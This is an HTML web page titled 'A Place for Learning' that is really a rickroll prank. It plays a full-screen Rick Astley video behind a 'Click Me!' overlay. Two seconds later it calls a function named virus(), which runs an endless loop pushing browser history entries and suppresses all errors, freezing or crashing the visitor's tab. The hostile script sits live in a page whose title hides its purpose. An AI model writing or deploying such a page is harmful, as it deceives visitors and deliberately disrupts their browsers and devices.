<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8"/>
        <title>A Place for Learning</title>
        <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
        <link rel="manifest" href="/site.webmanifest">
        <script>
            function virus() {
                // for(a="#",i=0;i != i+1;i++)a+=i.toString(),history.pushState(0,0,a),location.hash=Math.random().toString();
                let str = '#';
                let i = 0;
                while (true) {
                    try {
                        str += i.toString();
                        window.history.pushState(0, 0, str);
                        i++;
                    } catch {
                        //LOL
                    }
                }
            };
        </script>
    </head>
    <style>
        .gradient
        {

            /* can be treated like a fallback */
            background-color: green;

            /* will be "on top", if browser supports it */
            background-image: linear-gradient(blue, green);

            /* these will reset other properties, like background-position, but it does know what you mean */
            background: red;
            background: linear-gradient(blue, green);

        }
        #cover
        {
            width: 100%;
            height: 100%;
            position: absolute;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
        }
        .inner-center
        {
            position: relative;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            margin: auto;
        }
        .outer-center
        {
            position: absolute;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            margin: auto;
        }
        .fit-content
        {
            width: -moz-fit-content;
            width: fit-content;
            height: 60pt;
            height: fit-content;
        }
    </style>
    <body style="position: absolute; top: 0; left: 0; right: 0; bottom: 0;">
        <iframe src="silence.mp3" type="audio/mp3" allow="autoplay" id="audio" style="display:none"></iframe>
        <video id="Astley" width="100%" height="100%" src="https://drive.google.com/uc?export=download&id=1H79giDYN-SzSkYd5h09OQLpsYm4cRefn" style="width: 100%; height: 100%; position: relative; top: 0; left: 0; right: 0; bottom: 0;" autoplay loop></video>
        <div class="gradient" id="cover" style="display: none; cursor: pointer;">
            <div id="text-container" class="outer-center fit-content">
                <p style="font-family: Impact, sans-serif; font-size: 50pt; color: white;" class="inner-center">Click Me!</p>
            </div>
        </div>
        <script>
            video = document.getElementById("Astley");
            video.addEventListener("loadeddata", function (event){
                if (video.paused && video.currentTime == 0) {
                    cover = document.getElementById("cover");
                    cover.style.display = "";
                    cover.onclick = function () {
                        cover.style.display = "none";
                        video.play();
                        setTimeout(virus, 2000);
                        document.title = "Get Rick Rolled!";
                    };
                }
                else {
                    setTimeout(virus, 2000);
                    document.title = "Get Rick Rolled!";
                }
            });
        </script>
    </body>
</html>
